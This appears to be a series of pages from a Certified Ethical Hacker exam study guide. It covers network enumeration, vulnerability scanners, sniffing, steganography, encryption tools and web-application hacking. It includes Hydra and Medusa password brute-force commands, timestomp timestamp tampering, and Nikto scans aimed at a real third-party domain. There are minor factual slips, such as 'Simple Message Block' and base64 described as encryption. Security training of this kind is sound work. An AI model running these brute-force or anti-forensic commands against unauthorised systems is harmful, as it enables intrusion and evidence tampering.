### NETBIOS Enumerator \* NetBIOS Enumerator tool is a \*\*GUI based windows tool\*\* used to enumerate the information of the windows remote machine \* Pass the IP range to scan and then the work starts !\[http://nbtenum.sourceforge.net/\](/files/3IBomdOJqEGxbVDxcvG3) {% embed url="" %} ### Nmap {% hint style="info" %} Port \*\*137\*\* is utilized by the \*\*NetBIOS Name service\*\*. Port \*\*139\*\* is used by \*\*SMB\*\* dialects that communicate over NetBIOS. {% endhint %} \`\`\` nmap -sV -v --script nbstat.nse 10.10.10.10 nmap -sU -p 137 --script nbstat.nse 10.10.10.10 \`\`\` ## SNMP Simple Network Management Protocol (SNMP) is \*\*a networking protocol used for the management and monitoring of network-connected devices in Internet Protocol networks\*\*. It is an application layer protocol in the OSI model framework. Typically, the SNMP protocol is implemented using the User Datagram Protocol (UDP). {% hint style="info" %} \*\*Simple Network Management Protocol (SNMP)\*\* lives on Port number: \*\*161\*\* {% endhint %} ### \*\*snmp-check\*\* \* snmp-check is a tool used to check whether the respective server is vulnerable to SNMP Attacks. \* If the server is vulnerable then the snmp-check enumerate the information of that machine. \`\`\` snmp-check 10.10.10.x \`\`\` {% embed url="" %} ### SoftPerfect Network Scanner \* SNMP SoftPacket Network Scanner is a GUI based windows tool. \* Steps to initialize: \* Click options menu → Remote SNMP→ Mark All/None. \* Pass the IPV4 Range on the input field and start scanning. !\[https://www.softperfect.com/products/networkscanner/\](/files/pxeoOxffCMG2q8NGXkeH) {% embed url="" %} ## LDAP LDAP (Lightweight Directory Access Protocol) is an open and cross-platform protocol used for directory services authentication. Directory services store the users, passwords, and computer accounts, and share that information with other entities on the network. {% hint style="info" %} \*\*Lightweight Directory Access Protocol (LDAP)\*\* lives on Port number: \*\*389\*\* {% endhint %} {% hint style="info" %} \*\*Lightweight Directory Access Protocol / Secure (LDAP/S)\*\* lives on Port number: \*\*636\*\* {% endhint %} ### AD Explorer \* AD Explorer is a Windows tool used to enumerate a domain that has LDAP misconfiguration. \* Use this tool to get the data of the Active Directory. > \*\*Active Directory Explorer (AD Explorer)\*\* is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute. !\[https://www.zubairalexander.com/blog/active-directory-explorer/\](/files/PPpZAjqSiIzmeu8l98iQ) {% embed url="" %} Official Microsoft Link for the tool {% endembed %} ## NFS \*\*The Network File System (NFS)\*\* is a \*\*mechanism for storing files on a network\*\*. It is a distributed file system that allows users to access files and directories located on remote computers and treat those files and directories as if they were local. {% hint style="info" %} \*\*Network File System (NFS)\*\* runs on port number: \*\*2049\*\* {% endhint %} ### Nmap Script \`\`\` nmap -p 2049 10.10.10.x \`\`\` ### SuperEnum \* Super Enum is a Linux based tool \* \*\*Steps:\*\* \* Create a file "Target.txt" and add the target IP address. \* Run script ### RPC Scan \* Tool to communicate with RPC services and check misconfigurations on NFS shares \* RPC Scan is a Linux based tool \`\`\` python3 rpc-scan.py 10.10.10.19 --rpc \`\`\` {% embed url="" %} ## DNS DNS, or the Domain Name System, translates human-readable domain names (for example, \[www.google.com\](http://www.google.com)) to machine-readable IP addresses (for example, 142.251.42.68). \* A few example tools for DNS Enumeration are: \* Dig \* nslookup \* dnsrecon ## RPC In distributed computing, a remote procedure call is when a computer program causes a procedure to execute in a different address space, which is coded as if it were a normal procedure call, without the programmer explicitly coding the details for the remote interaction. {% hint style="info" %} \*\*Remote Procedure Calls (RPC)\*\* lives on port number: \*\*111\*\* {% endhint %} ## \*\*SMB\*\* In computer networking, Server Message Block, one version of which was also known as Common Internet File System, is a communication protocol for providing shared access to files and printers between nodes on a network. It also provides an authenticated inter-process communication mechanism. {% hint style="info" %} \*\*Simple Message Block (SMB)\*\* lives on port number: \*\*139, 445\*\* {% endhint %} ### Nmap Scripts \`\`\` nmap -p 445 --script smb-enum 10.10.10.x nmap -p 139 --script smb-enum-shares 10.10.10.x nmap -p 139 --script smb-double-pulsar-backdoor 10.10.10.X \`\`\` ### SMBMap SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks. {% embed url="" %} \`\`\` smbmap -R tmp -H 10.10.10.x \`\`\` ### SMBClient smbclient is \*\*a client that can 'talk' to an SMB/CIFS server\*\*. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on. \`\`\` smbclient -L \\\\192.168.29.49 \`\`\` {% embed url="" %} {% hint style="success" %} My suggestion is to use Nmap to discover the SMP, RPC, FTP {% endhint %} ## Global Network Inventory Global Network Inventory is a \*\*powerful and flexible software and hardware inventory system\*\* that can be used as an audit scanner in an agent-free and zero deployment environment. Global Network Inventory can audit remote computers and even network appliances, including switches, network printers, document centers, etc. This tool is a GUI based windows tool that has the ability to enumerate lots of information and display it to us. {% hint style="success" %} If you are done with all the tools and have no clue about the target then go with this tool. {% endhint %} !\[https://global-network-inventory.windows10compatible.com/\](/files/1jo8k2P9qHrNfBueKaZ3) {% embed url="" %} ## Enum4Linux Enum4linux is \*\*an enumeration tool capable of detecting and extracting data from Windows and Linux operating systems\*\*, including those that are Samba (SMB) hosts on a network. Enum4linux is capable of discovering the following: Password policies on a target. The operating system of a remote target. \`\`\` enum4linux -A 10.10.10.26 enum4linux -u guru -p cloudflare -n 10.10.10.x enum4linux -u guru -p cloudflare -U 10.10.10.x enum4linux -u guru -p cloudflare -o 10.10.10.x enum4linux -u guru -p cloudflare -P 10.10.10.x enum4linux -u guru -p cloudflare -G 10.10.10.x enum4linux -u guru -p cloudflare -S 10.10.10.x • -U -> Enumerate the users on the share • -o -> Enumerate the Operating System of the share • -P -> Enumerate the password policy of the share • -G -> Enumerate the Group policy of the share • -S -> Enumerate the Shared policy of the share \`\`\` --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/vulnerability-analysis.md). # Vulnerability Analysis ## Introduction A vulnerability assessment is a systematic review of security weaknesses in an information system. It evaluates if the system is susceptible to any known vulnerabilities, assigns severity levels to those vulnerabilities, and recommends remediation or mitigation, if and whenever needed. Examples of threats that can be prevented by vulnerability assessment include: 1. SQL injection, XSS, and other code injection attacks. 2. Escalation of privileges due to faulty authentication mechanisms. 3. Insecure defaults: software that ships with insecure settings, such as a guessable admin password. ## List of Vulnerability Analysis and Assessment Tools ### OpenVAS OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthenticated and authenticated testing, various high-level and low-level internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test. The scanner obtains the tests for detecting vulnerabilities from a feed that has a long history and daily updates. {% embed url="" %} ### Nessus Nessus is \*\*a network security scanner\*\*. It utilizes plug-ins, which are separate files, to handle the vulnerability checks. This makes it easy to install plug-ins and to see which plug-ins are installed to make sure that you are current. Nessus uses a server-client architecture. {% embed url="" %} ### GFI LanGuard GFI LanGuard allows \*\*you to scan, detect, assess and rectify security vulnerabilities in your network\*\* and secure it with minimal administrative effort. It gives you a complete picture of your network setup, which helps you maintain a secure network faster and more effectively. {% embed url="" %} ### Nikto Nikto is an Open Source (\[GPL\](http://www.gnu.org/licenses/licenses.html#GPL)) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated. {% embed url="" %} #### Example usage of Nikto \`\`\` nikto -h www.google.com -Tuning x nikto -h www.google.com -Cgidirs all nikto -h www.google.com -o nikto\_scan\_results -F txt \`\`\` --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/sniffing.md). # Sniffing ## Introduction Packet sniffing is the practice of gathering, collecting, and logging some or all packets that pass thru a computer network, regardless of how the packet is addressed. In this way, every packet, or a defined subset of packets, may be gathered for further analysis. You, as a network administrator, can use the collected data for a wide variety of purposes, like monitoring bandwidth and traffic. A packet sniffer, sometimes called a packet analyzer, is composed of two main parts. First, a network adapter that connects the sniffer to the existing network. Second, software that provides a way to log, see, or analyze the data collected by the device. ## WireShark Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named "Ethereal," the project was renamed "Wireshark" in May 2006 due to trademark issues. {% hint style="success" %} I can't stress how much you need to learn Wireshark. Since this wireshark is very important from an exam point of view. So, please learn. You can Google stuff online. There are tons of video tutorials for Wireshark. {% endhint %} \* \[ \] How to analyze the packets \* \[ \] Learn to analyze the list of IPs that had DDos attacks. \* \[ \] Learn to find sensitive data in the HTTP flow. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganography.md). # Steganography ## Introduction Steganography is the practice of concealing a message within another message or a physical object. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video. ## Timestomp Timestomp is a \*\*utility co-authored\*\* by developers James C. Foster and Vincent Liu. The software's goal is to allow for the deletion or modification of timestamp-related information in files. The "Timestomp MACE Change Proof" screenshot is a final shot of the operating system's interpretation of the modified timestamp. {% embed url="" %} \`\`\` timestomp seceret.txt. -m "02/11/2021 08:06:04" • -m → Modify Values • -a → Accessed • -c → Created \`\`\` ## Hiding Files using New Technology File System(NTFS) Streams {% embed url="" %} ## Snow Snow is a free steganography tool to hide messages in text using white spaces. It takes a file from you and then hides the specified message after encrypting it using a password that you specify. You can hide any message in any text file and then simply retrieve it in an easy way. After hiding sensitive information in a text file, you can send that to any user via email or file-sharing services and then don’t worry about if someone steals the information as the message is encrypted. #### Encryption \`\`\` snow -C -m "Secret Text Goes Here!" -p "magic" readme.txt readme2.txt • -m → Set your message • -p → Set your password \`\`\` #### Decryption \`\`\` ./snow -C -p "magic" output.txt \`\`\` {% embed url="" %} ## OpenStego OpenStego provides two main functionalities: \* \*\*Data Hiding:\*\* It can hide any data within a cover file (e.g. images). \* \*\*Watermarking (beta):\*\* Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying. {% embed url="" %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cryptography.md). # Cryptography ## Introduction Cryptography is the science of protecting information by transforming it into a secure format. This process, called encryption, has been used for centuries to prevent handwritten messages from being read by unintended recipients. Today, cryptography is used to protect digital data. It is a division of computer science that focuses on transforming data into formats that cannot be recognized by unauthorized users. An example of basic cryptography is an encrypted message in which letters are replaced with other characters. To decode the encrypted contents, you would need a grid or table that defines how the letters are transposed. For example, the translation grid below could be used to decode \*\*"aHR0cHM6Ly90aGVndXJ1c2VjLmNvbS8"\*\* \*\*as \*\*\*\*"\*\*\[\*\*https://thegurusec.com\*\*\](https://thegurusec.com)\*\*"\*\*. ## Tools ### Calculate One-way Hashes using HashClac \* You may use this tool to calculate the \*\*MD5 hashes\*\* {% embed url="" %} ### Calculate MD5 Hashes using MD5 Calculator \* Use this tool to compare the hashes with other hashes {% embed url="" %} ### Calculate MD5 hashes for files using HashMyFiles HashMyFiles is a small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. {% embed url="" %} ## Perform File and Text Message Encryption using CryptoForge {% embed url="" %} ### Perform File Encryption using Advanced Encryption Package {% embed url="" %} ### Encrypt and Decrypt messages using BCText Encoder {% embed url="" %} ### Perform Disk Encryption Using VeraCrypt VeraCrypt is an open-source utility for on-the-fly encryption. The software can create a virtual encrypted disk that works just like a regular disk but within a file. It can also encrypt a partition or the entire storage device with pre-boot authentication. VeraCrypt is a fork of the discontinued TrueCrypt project \* \*\*Creating an encrypted VeraCrypt volume File\*\* \* Open the application and click “Create Volume”. \* tap on “Create an Encrypted File Container”. \* Select a path where the volume has to be saved. \* Now, mention the volume size. \* Set a password for the encrypted volume file. \* For file system format we can set as “FAT“ and cluster as “Default”. \* \*\*Mounting the Encrypted file into a Volume\*\* \* Select any volume of your choice. \* Select the VeraCrypt volume created before to be added. \* Select Mount and it may prompt for a password. \* \*\*Uploading Files into VeraCrypt Virtual Encrypted Volume\*\* \* Create/Copy/Move the files into the Volume which you choose for mounting. \* Paste all your confidential files inside that virtual volume. \* Once completed, open the VeraCrypt application and then press “Dismount”. {% embed url="" %} ### Bitlocker BitLocker Drive Encryption is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned computers. BitLocker provides the most protection when used with a Trusted Platform Module (TPM) version 1.2 or later. The TPM is a hardware component installed in many newer computers by the computer manufacturers. It works with BitLocker to help protect user data and to ensure that a computer has not been tampered with while the system was offline. {% embed url="" %} Official Link of Microsoft {% endembed %} ### Rohos Disk Encryption {% embed url="" %} ### Cryptool CrypTool is an open-source project that is a free e-learning software for illustrating cryptographic and cryptanalytic concepts. According to "Hakin9", CrypTool is worldwide the most widespread e-learning software in the field of cryptology. CrypTool implements more than \*\*400 algorithms.\*\* {% embed url="" %} {% hint style="success" %} I strongly recommend you learn all these tools. At least Go through the tools. {% endhint %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/cloud-computing.md). # Cloud Computing ## Introduction Cloud computing is the on-demand availability of computer system resources, especially data storage and computing power, without direct active management by the user. Large clouds often have functions distributed over multiple locations, each location being a data centre. ### Tools for Enumeration 1. Lazys3 2. S3Scanner ## Amazon Web services {% embed url="" %} {% embed url="" %} This Book has all details about AWS Vuln {% endembed %} --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://book.thegurusec.com/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/hacking-web-applications-and-servers.md). # Hacking Web Applications & Servers ## Identify Technology (Footprint) \* Identifying the technology that is used by the web application would give us an idea on how to exploit that particular application. #### List of tools used to identify the technology 1. httprecon 2. \[wappalyzer\](https://www.wappalyzer.com/) 3. whatweb (CLI) ### Other Methods \* Using Telnet \* Using NetCat ### Nmap Scripts #### Normal HTTP Enumeration \`\`\` nmap -sV --script=http-enum www.xyz.com \`\`\` #### WAF Detection \`\`\` nmap -p 80,443 --script=http-waf-detect www.xyz.com \`\`\` ## Directory Bruteforce Brute force directory guessing attacks are very common attacks used against websites and web servers. They are \*\*used to finding hidden and often forgotten directories on a site to try to compromise\*\*. {% embed url="" %} Check out \[Alexis Ahmed's\](https://ke.linkedin.com/in/alexisahmed) video on Fuzzing and Directory Brute-Force. This can gives you an idea. {% endembed %} ### Dirbuster for Directory Brute force DirBuster is a multi-threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However, tools of this nature are often only good as the directory and file list they come with. A different approach was taken to generate this. The list was generated from scratch, by crawling the Internet and enough, the directory and files that are actually used by developers! DirBuster comes with a total of 9 different lists, this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide. {% embed url="" %} #### CheatSheets for Dirbuster {% embed url="" %} {% hint style="info" %} You can use any directory brute force tools eg: GoBuster, Dirsearch, BruteX, etc... But make your mind that every tool makes the same process. So, master one tool and you are good to go. {% endhint %} ## Service Bruteforce ### Hydra Man! I can't say words about this tool!🔥This is one of my fav tools for brute force passwords for services running on a network. \`\`\` hydra -L /Path/To/Username/WordList -P /Path/To/Password/WordList 10.10.10.x ftp \`\`\` On Hydra, you can set your desired service to brute force, on the above command you can see I have set the brute force to FTP. Same as you can set for any service. Examples, SSH, RDP, SAMBA, etc... ### Medusa Medusa is also one of the best tools out there for brute force. Even though I love Hydra, I use medusa alot. Maybe I can prioritize Medusa first and Hydra second place. {% embed url="" %} This Medium has a comprehensive explanation on how tpo use medusa {% endembed %} \`\`\` medusa -h 10.10.10.x -U /root/Documents/user\_list.txt -p /root/Documents/pass\_list.txt -M ftp -F \`\`\` ## DVWA \*\*Damn Vulnerable Web Application (DVWA)\*\* is a PHP/MySQL web application that is damn vulnerable. DVWA aims to practice some of the most common web vulnerabilities, with various levels of difficulty. DVWA plays one of the major roles in the C|EH (Practical) exam. It is advisable to crack DVWA and get used to the box since the challenges may appear based on the challenges available on this box. {% hint style="warning" %} Hey! Thank you for being up here in my process. DVWA is one of the best applications for practising your web application attacks. Since I completed this challenge years before, I request you to work on this. I can't help you with each module in the DVWA but there are tons of video tutorials and blogs about this box. Please complete this box since this might be \*\*important\*\* for your exam. {% endhint %} #### I have attached the solution Playlist of DVWA below 👇🏻 check this out {% embed url="" %} {% endembed %} #### By now, you should have the knowledge on: > \* \[ \] Command Injection > \* \[ \] Local File Inclusion (LFI) > \* \[ \] Crafting Payload using msfvenom > \* \[ \] Gaining Reverse shell using netcat or metasploit > \* \[ \] SQL Injection > \* \[ \] XSS > \* \[ \] CSRF > \* \[ \] Bruteforce ## Wordlist {% hint style="success" %} For \*\*Certified Ethical Hacker (Practical)\*\* exam, You don't need to worry about the wordlist since most probably they would have attached the wordlist for each module so make use of those first. If you have any failures then go with the default wordlist. {% endhint %} ---